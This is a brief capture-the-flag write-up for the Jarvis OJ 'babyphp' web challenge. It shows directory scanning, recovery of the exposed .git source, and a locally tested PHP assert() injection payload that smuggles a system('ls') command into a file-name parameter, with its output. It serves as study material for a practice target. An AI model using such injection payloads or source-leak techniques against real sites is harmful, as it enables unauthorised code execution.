Jarvis OJ-babyphp

1,
dirsearch.py -u http://web.jarvisoj.com:32798/ -e php
2.
GitHack.py http://web.jarvisoj.com:32798/.git/
3.
[root@172 web.jarvisoj.com_32798]# tree
.
├── index.php
└── templates
├── about.php
├── contact.php
├── flag.php
└── home.php

1 directory, 5 files

<?php $file = "templates/" . $page . ".php"; $file = "flag'.system(\"ls ./;\").'"; echo "strpos('$file', '..') === false"."\n"; assert("strpos('$file', '..') === false") or die("Detected hacking attempt!"); //assert("strpos('flag'.system("ls templates/;").'', '..') === false") or die("Detected hacking attempt!"); assert("file_exists('$file')") or die("That file doesn't exist!"); ?>

output :
strpos(‘flag’.system(“ls ./;”).’’, ‘…’) === false
index.php
templates
index.php
templates
PHP Warning: assert(): Assertion “file_exists(‘flag’.system(“ls ./;”).’’)” failed in /root/web.jarvisoj.com_32798/index.php on line 13
That file doesn’t exist!

总结：

对 assert 理解不够。
assert(“strpos(‘flag’.system(“ls ./;”).’’, ‘…’) === false”);执行原理